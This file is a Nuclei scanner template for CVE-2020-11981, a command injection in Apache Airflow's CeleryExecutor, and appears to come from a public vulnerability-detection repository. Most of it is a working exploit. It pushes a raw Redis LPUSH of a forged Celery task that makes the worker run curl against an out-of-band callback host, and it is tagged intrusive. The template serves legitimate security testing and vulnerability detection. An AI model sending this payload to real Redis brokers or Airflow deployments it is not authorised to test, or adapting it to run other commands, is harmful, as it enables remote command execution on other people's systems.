nuclei-templates/network/cves/2020/CVE-2020-11981.yaml

69 lines
2.9 KiB
YAML

id: CVE-2020-11981
info:
name: Apache Airflow <=1.10.10 - Command Injection
author: pussycat0x
severity: critical
description: |
An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.
impact: |
Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
remediation: Upgrade apache-airflow to version 1.10.11 or higher.
reference:
- https://github.com/apache/airflow/pull/9178
- https://github.com/vulhub/vulhub/tree/master/airflow/CVE-2020-11981
- https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-11981
cwe-id: CWE-78
epss-score: 0.9386
epss-percentile: 0.98955
cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: apache
product: airflow
shodan-query: product:"redis"
tags: cve,cve2020,network,redis,unauth,apache,airflow,vulhub,intrusive
variables:
data: "*3\r
$5\r
LPUSH\r
$7\r
default\r
$936\r
{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \""
encode1: '[[["curl", "http://'
encode2: '"]], {}, {"chain": null, "chord": null, "errbacks": null, "callbacks": null}]'
end: '"}'
tcp:
- inputs:
- data: "{{data+base64(encode1+'{{interactsh-url}}'+encode2)+concat(end+ '\r
')}}"
read: 1024
host:
- "{{Hostname}}"
- "{{Host}}:6379"
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: curl"
# digest: 4a0a0047304502210083625b56b2998978613b236cb30d019f076ac29c6751ab6982923ac3926edaf402204633b7051d25f2cfcdfce4df5bba96a444c3a233e92cb5d36bb410cfb33329da:922c64590222798bb761d5b6d8e72950